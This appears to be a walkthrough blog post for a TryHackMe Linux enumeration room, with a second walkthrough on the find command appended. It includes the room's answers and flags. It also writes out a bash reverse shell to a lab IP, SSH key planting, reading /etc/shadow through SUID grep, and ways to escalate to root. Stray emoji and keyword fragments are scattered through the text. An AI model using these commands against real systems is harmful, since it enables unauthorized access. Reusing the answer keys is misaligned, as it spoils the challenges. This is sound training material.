Local Enumeration -  Learn to efficiently enumerate a linux machine and identify possible weaknesses

Have you ever found yourself in a situation where you have no idea about "what to do after getting a reverse shell (access to a machine)"?

If your answer was "Yes", this room is definitely for you. This rooms aims at providing beginner basis in box enumeration, giving a detailed approach towards it. TryHackMe Linux: Local Enumeration

 

Here's a list of units that are going to be covered in this room:
 

• Unit 1 - Stabilizing the shell
• Exploring a way to transform a reverse shell into a stable bash or ssh shell.
•  
• Unit 2 - Basic enumaration
• Enumerate OS and the most common files to identify possible security flaws.
•  
• Unit 3 - /etc
• Understand the purpose and sensitivity of files under /etc directory.
•  
• Unit 4 - Important files
• Learn to find files, containing potentially valuable information.
•  
• Unit 6 - Enumeration scripts
•  Automate the process by running multiple community-created enumeration scripts.

Browse to the MACHINE_IP:3000 and follow the instructions.
To continue with the room material, you need to get a reverse shell using a PHP payload and a netcat listener (nc -lvnp 1234).

 
Start up the machine from TryHackMe and go to the url: Machine_IP:3000.

Now, go to this URL http://Machine_IP:3000/cmd.php Then go to your command line and open a netcat listener on the port you set for the php payload.  (reverse shell cheatsheet - CLICK HERE)

nc -nvlp 1234

Now upload this bash reverse shell in this box and hit enter : bash -c 'bash -i >& /dev/tcp/10.8.61.234/1234 0>&1'

Our tun0 IP with Port :- 10.8.61.234/1234

Task 2 Unit 1 - tty


As you might have noticed, a netcat reverse shell is pretty useless and can be easily broken by simple mistakes.

In order to fix this, we need to get a 'normal' shell, aka tty (text terminal).
Note: Mainly, we want to upgrade to tty because commands like su and sudo require a proper terminal to run.

One of the simplest methods for that would be to execute /bin/bash. In most cases, it's not that easy to do and it actually requires us to do some additional work.
Surprisingly enough, we can use python to execute /bin/bash and upgrade to tty:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Generally speaking, you want to use an external tool to execute /bin/bash for you. While doing so, it is a good idea to try everything you know, starting from python, finishing with getting a binary on the target system.
 

List of static binaries you can get on the system: github.com/andrew-d/static-binaries

 

Try experimenting with the netcat shell you obtained in the previous task and try different versions.
 

Read more about upgrading to TTY: blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
 

1) How would you execute /bin/bash with perl?

HINT :- Research! Maybe GTFOBins will give you an idea

Ans :- perl -e 'exec "/bin/bash";'

Task 3 Unit 1 - ssh

To make things even better, you should always try and get shell access to the box.

id_rsa file that contains a private key that can be used to connect to a box via ssh. It is usually located in the .ssh folder in the user's home folder. (Full path: /home/user/.ssh/id_rsa)

Get that file on your system and give it read-only permissions
(chmod 600 id_rsa) and connect by executing ssh -i id_rsa user@ip).


In case if the target box does not have a generated id_rsa file (or you simply don't have reading permissions for it), you can still gain stable ssh access. All you need to do is generate your own id_rsa key on your system and include an associated key into authorized_keys file on the target machine. 

Execute ssh-keygen and you should see id_rsa and id_rsa.pub files appear in your own .ssh folder. Copy the content of the id_rsa.pub file and put it inside the authorized_key file on the target machine (located in .ssh folder). After that, connect to the machine using your id_rsa file.

1) Where can you usually find the id_rsa file? (User = user)

Ans :- /home/user/.ssh/id_rsa

2)Is there an id_rsa file on the box? (yay/nay)

Ans :- nay 

Task 4 Unit 2 - Basic enumeration

Once you get on the box, it's crucially important to do the basic enumeration. In some cases, it can save you a lot of time and provide you a shortcut into escalating your privileges to root.

> First, let's start with the uname command. uname prints information about the system.

Execute uname -a to print out all information about the system.
This simple box enumeration allows you to get initial information about the box, such as distro type and version. From this point you can easily look for known exploits and vulnerabilities.

> Next in our list are auto-generated bash files.
Bash keeps tracks of our actions by putting plaintext used commands into a history file. (~/.bash_history)

If you happen to have a reading permission on this file, you can easily enumerate system user's action and retrieve some sensitive infrmation. One of those would be plaintext passwords or privilege escalation methods.

.bash_profile and .bashrc are files containing shell commands that are run when Bash is invoked. These files can contain some interesting start up setting that can potentially reveal us some infromation. For example a bash alias can be pointed towards an important file or process.


> Next thing that you want to check is the sudo version.
Sudo command is one of the most common targets in the privilage escalation. Its version can help you identify known exploits and vulnerabilities. Execute sudo -V to retrieve the version.


For example, sudo versions < 1.8.28 are vulnerable to CVE-2019-14287, which is a vulnerability that allows to gain root access with 1 simple command.

 

> Last part of basic enumeration comes down to using our sudo rights.
Users can be assigned to use sudo via /etc/sudoers file. It's a fully customazible file that can either limit or open access to a wider range of permissions. Run sudo -l   to check if a user on the box is allowed to use sudo with any command on the system.







 

Most of the commands open us an opportunity to escalate our priviligies via simple tricks described in GTFObins.
https://gtfobins.github.io/#+sudo


Note: Output on the picture demonstrates that user may run ALL commands on the system with sudo rights. A given configuration is the easiest way to get root.

1) How would you print machine hardware name only?

Ans :- uname -m

2) Where can you find bash history?

Ans :- ~/.bash_history

3) What's the flag?

Ans :- thm{clear_the_history}

Task 5 Unit 3 - /etc

 
Etc (etcetera) - unspecified additional items. Generally speaking, /etc folder is a central location for all your configuration files and it can be treated as a metaphorical nerve center of your Linux machine.

Each of the files located there has its own unique purpose that can be used to retrieve some sensitive information (such as passwords). The first thing you want to check is if you are able to read and write the files in /etc folder. Let's take a look at each file specifically and figure out the way you can use them for your enumeration process.

> /etc/passwd

This file stores the most essential information, required during the user login process. (It stores user account information). It's a plain-text file that contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.

Read the /etc/passwd file by running cat /etc/passwd and let's take a closer look.

Each line of this file represents a different account, created in the system. Each field is separated with a colon (:) and carries a separate value.

goldfish:x:1003:1003:,,,:/home/goldfish:/bin/bash

1. (goldfish) - Username
2. (x) - Password. (x character indicates that an encrypted account password is stored in /etc/shadow file and cannot be displayed in the plain text here)
3. (1003) - User ID (UID): Each non-root user has his own UID (1-99). UID 0 is reserved for root.
4. (1003) - Group ID (GID): Linux group ID
5. (,,,) - User ID Info: A field that contains additional info, such as phone number, name, and last name. (,,, in this case means that I did not input any additional info while creating the user)
6. (/home/goldfish) - Home directory: A path to user's home directory that contains all the files related to them.
7. (/bin/bash) - Shell or a command: Path of a command or shell that is used by the user. Simple users usually have /bin/bash as their shell, while services run on /usr/sbin/nologin.


How can this help? Well, if you have at least reading access to this file, you can easily enumerate all existing users, services and other accounts on the system. This can open a lot of vectors for you and lead to the desired root.

Otherwise, if you have writing access to the /etc/passwd, you can easily get root creating a custom entry with root priveleges.
(For more info: hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation)
http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation



> /etc/shadow

The /etc/shadow file stores actual password in an encrypted format (aka hashes) for user’s account with additional properties related to user password. Those encrypted passwords usually have a pretty similar structure, making it easy for us to identify the encoding format and crack the hash to get the password.

So, as you might have guessed, we can use /etc/shadow to retrieve different user passwords. In most of the situations, it is more than enough to have reading permissions on this file to escalate to root privileges.
 

cat /etc/shadow


goldfish:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAM

Wf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:184

83:0:99999:7:::

 

1. (goldfish) - Username
2. ($6$1FiLdnFwT...) - Password : Encrypted password.
Basic structure: **$id$salt$hashed**, The $id is the algorithm used On GNU/Linux as follows:
- $1$ is MD5
- $2a$ is Blowfish
- $2y$ is Blowfish
- $5$ is SHA-256
- $6$ is SHA-512
3. (18483) - Last password change: Days since Jan 1, 1970 that password was last changed.
4. (0) - Minimum: The minimum number of days required between password changes (Zero means that the password can be changed immidiately).
5. (99999) - Maximum: The maximum number of days the password is valid.
6. (7) - Warn: The number of days before the user will be warned about changing their password.

 

What can we get from here? Well, if you have reading permissions for this file, we can crack the encrypted password using one of the cracking methods.

 

Just like with /etc/passwd, writeable permission can allow us to add a new root user by making a custom entry.

> /etc/hosts

/etc/hosts is a simple text file that allows users to assign a hostname to a specific IP address. Generally speaking, a hostname is a name that is assigned to a certain device on a network. It helps to distinguish one device from another. The hostname for a computer on a home network may be anything the user wants, for example, DesktopPC or MyLaptop.

You can try editing your own /etc/hosts file by adding the MACHINE_IP there like so:

From now on you'll be able to refer to the box as box.thm.

Why do we need it? In real-world pentesting this file may reveal a local address of devices in the same network. It can help us to enumerate the network further.
 

1) Can you read /etc/passwd on the box? (yay/nay)

Ans :- yay

Task 6 Unit 4 - Find command and interesting files

Since it's physically impossible to browse the whole filesystem by hand, we'll be using the find command for this purpose.
 

The most important switches for us in our enumeration process are -type and -name.
 

The first one allows us to limit the search towards files only -type f and the second one allows us to search for files by extensions using the wildcard (*).

Basically, what you want to do is to look for interesting log (.log) and configuration files (.conf). In addition to that, the system owner might be keeping backup files (.bak).

Here's a list of file extensions you'd usually look for: List.
 

To find the password I used the command:

find -type f -name “*.bak” 2>/dev/null     

OR

locate .bak
  
   
To find the flag we can use the same commands only to search for a file called flag.conf as it ask to find a flag and the hint said it could be in a .conf file

find / -type f -name “flag.conf” 2>/dev/null
   
OR

locate flag.conf    

1) What's the password you found?

Ans :-THMSkidyPass

2) Did you find a flag?

Ans :- thm{conf_file}

Task 7 Unit 4 - SUID

Set User ID (SUID) is a type of permission that allows users to execute a file with the permissions of another user.

Those files which have SUID permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found SUID bit enabled binaries, then those file/program/command can be run with root privileges.

SUID abuse is a common privilege escalation technique that allows us to gain root access by executing a root-owned binary with SUID enabled.

 

You can find all SUID file by executing this simple find command:

find / -perm -u=s -type f 2>/dev/null

OR

find / -perm -4000 2>/dev/null

-u=s searches files that are owned by the root user.
-type f search for files, not directories

 

After displaying all SUID files, compare them to a list on GTFObins to see if there's a way to abuse them to get root access.
 

1) Which SUID binary has a way to escalate your privileges on the box?

Ans :- grep

2) What's the payload you can use to read /etc/shadow with this SUID?

Ans :-  grep ' ' /etc/shadow

Task 8 [Bonus] - Port Forwarding

According to Wikipedia, "Port forwarding is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall".

 

Port forwarding not only allows you to bypass firewalls but also gives you an opportunity to enumerate some local services and processes running on the box.

The Linux netstat command gives you a bunch of information about your network connections, the ports that are in use, and the processes using them. In order to see all TCP connections, execute netstat -at | less. This will give you a list of running processes that use TCP. From this point, you can easily enumerate running processes and gain some valuable information.

netstat -tulpn will provide you a much nicer output with the most interesting data.


https://fumenoid.github.io/posts/port-forwarding



Read more about port forwarding here: fumenoid.github.io/posts/port-forwarding
Try using those commands on your system!

Task 9 Unit 5 - Automating scripts

Even though I, personally, dislike any automatic enumeration scripts, they are really important to the privilege escalation process as they help you to omit the 'human error' in your enum process.

> Linpeas

LinPEAS - Linux local Privilege Escalation Awesome Script (.sh) is a script that searches for possible paths to escalate privileges on Linux/ hosts.

Linpeas automatically searches for passwords, SUID files and Sudo right abuse to hint you on your way towards root.

 

They are different ways of getting the script on the box, but the most reliable one would be to first download the script on your system and then transfer it on the target.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

 

After that, you get a nice output with all the vulnerable parts marked.

> LinEnum

The second tool on our list is LinEnum. It performs 'Scripted Local Linux Enumeration & Privilege Escalation Checks' and appears to be a bit easier than linpeas.

You can get the script by running:


wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Now, as you have two tools on the box, try running both of them and see if either of them shows something interesting!

Please note: It's always a good idea to run multiple scripts separately and compare their output, as far as each one of them has their own specific scope of 

exploration. Got it!

Task 10 Resources and what's next?

Congratulations! You have successfully gone through Linux local enumeration!
Now you can understand the main concepts of manual and automatic enumeration which will lead you towards obtaining root!


We recommend you to continue your education by completing these awesome rooms, covering more in-depth privilege escalation:

1. https://tryhackme.com/room/sudovulnsbypass
2. https://tryhackme.com/room/commonlinuxprivesc
3. https://tryhackme.com/room/linuxprivesc


After doing so, you can practice your skills by completing these easy challenge machines:

1. https://tryhackme.com/room/vulnversity
2. https://tryhackme.com/room/basicpentestingjt
3. https://tryhackme.com/room/bolt
4. https://tryhackme.com/room/tartaraus
 

Bonus :-

1) Common Linux File Extension :-  https://lauraliparulo.altervista.org/most-common-linux-file-extensions/

2) Port Forwarding :- https://fumenoid.github.io/posts/port-forwarding

3) Local File Enumeration Scripts :- https://github.com/Arr0way/linux-local-enumeration-script

4) For "Clear" Command Fix :- export TERM=xterm

Disclaimer

Find command in linux

To be precise, the ‘find’ command is used to search for files in a directory hierarchy, and as the necessary explanation is available there, we will look at the tasks.


When you know exactly what you’re looking for, you don’t need to search for it; you just have to find it. Find command in linux to search a file and directories


This tutorial will help you understand how to use the find command effectively in a CTF context. It is written in a way that you won’t have to refer to the man page to complete it, although I recommend the man page for further reading.


The syntax of the command can be broken down as such:

 find where what 


Firstly you tell the system to f🤟🏻ind something; secondly you tell it where to look; and finally, you tell it what to look for.

You don’t need to specify when you’re looking in your working directory. Also, you can use wildcards as well, in specifying both a directory and a name.


Note: There's no VM to deploy in this room. You only need to enter the commands that would be used to find what the questions ask for. You can also test the commands on your own terminal (if you have access to a Unix or Unix-like system) to check the output of find with different options. However, that's not necessary; this is a walkthrough, and everything you need to solve this room is in the tasks' description.find command in linux to search a string


On your terminal, execute the command:

touch file-1 file-2

This command will create two files, named file-1 and file-2 respectively, in your current working directory.


Now, execute:

find file*

As you can see, the command outputs both of your files.


This time, execute:

find *1

Only file-1 is in the output.

Be More Specific

Most of the time, you won’t be looking for something in your working directory. The first argument of your find command should be the directory you want to search. The command will search in that directory and in all its subdirectories. So, if you want to search the whole filesystem, your command should begin with find /. find command in amazon linux


Two very useful flags are the -type and -name flags. With -type, you can use d to only find directories, and f to only find files. The -name flag is used to specify a name or pattern to look for. You can type the whole name, or use wildcards to specify only part(s) of the name. If you use wildcards, you need to enclose your pattern in quotes, otherwise the command won't work as intended. It is useful to know that you can also use the -iname flag; same as -name, but case insensitive.

These commands are useful when you want to specify only part of the name of what you’re looking for. find command in linux with example
 

#1 Find all files whose name ends with “.xml”

Ans: find / -type f -name “*.xml”

#2 Find all files in the /home directory (recursive) whose name is “user.txt”

Ans: find /home -type f -iname user.txt

#3 Find all directories whose name contains the word “exploits”

Ans: find / -type d -name “*exploits*”

Know exactly what you're looking for

In some situations, specifying just the name of a file will not be enough. You can also specify the owner, the size, the permissions, and the time the file was last accessed/modified as well.


The username of the owner of a file is specified with the -user flag.


The size of a file is specified with the -size flag. When using numerical values, the formats -n, +n, and n can be used, where n is a number. -n matches values lesser than n, +n matches values greater than🤟🏻 n, and n matches values exactly n. To specify a size, you also need a suffix. c is the suffix for bytes, k for KiB’s, and M for MiB’s. So, if you want to specify a size less than 30 bytes, the argument -30c should be used. find command in linux centos 7


The -perm flag is used to specify permissions, either in octal form (ex. 644) or in symbolic form (ex. u=r). See here for a short reference. If you specify the permission mode as shown above (ex. 644 or u=r), then find will only return files with those permissions exactly. You can use the – or / prefix to make your search more inclusive. Using the – prefix will return files with at least the permissions you specify; this means that the -444 mode will match files that are readable by everyone, even if someone also has write and/or execute permissions. Using the / prefix will return files that match any of the permissions you have set; this means that the /666 mode will match files that are readable and writeable by at least one of the groups (owner, group, or others). find command in linux to find a file


Lastly, time-related searches will be covered. These are more complex but may prove useful. The flag consists of a word and a prefix. The words are min and time, for minutes and days, respectively. The prefixes are a, m, and c, and are used to specify when a file was last accessed, modified, or had its status changed. As for the numerical values, the same rules of the -size flag apply, except there is no suffix. To put it all together: in order to specify that a file was last accessed more than 30 minutes ago, the option -amin +30 is used. To specify that it was modified less than 7 days ago, the option -mtime -7 is used. (Note: when you want to specify that a file was modified within the last 24 hours, the option -mtime 0 is used.) linux in find command
 

 
#1 Find all files owned by the user "kittycat"

Ans: find / -type f -user kittycat


#2 Find all files that are exactly 150 bytes in size

Ans: find / -type f -size 150c


#3 Find all files in the /home directory (recursive) with size less than 2 KiB’s and extension ".txt"


Ans: find /home -type f -size -2k -name "*.txt"

 

#4 Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format)

Ans: find / -type f -perm 644


#5 Find all files that are only readable by anyone (use octal format)

Ans: find / -type f -perm /444


#6 Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)

Ans: find / -type f -perm -o=w -name "*.sh"


#7 Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)


Ans: find /usr/bin -type f -user root -perm -u=s

#8 Find all files that were not accessed in the last 10 days with extension ".png"


Ans: find / -type f -atime +10 -name "*.png"

#9 Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours

Ans: find /usr/bin -type f -mmin -120

To conclude this tutorial, there are two more things that you should know of. The first is that you can use the redirection operator > with the find command. You can save the results of the search to a file, and more importantly, you can suppress the output of any possible errors to make the output more readable. This is done by appending 2> /dev/null to your command. This way, you won’t see any results you’re not allowed to access.


The second thing is the -exec flag. You can use it in your find command to execute a new command, following the -exec flag, like so: -exec whoami \;. The possibilities enabled by this option are beyond the scope of this tutorial, but most notably it can be used for privilege escalation.
 

Disclaimer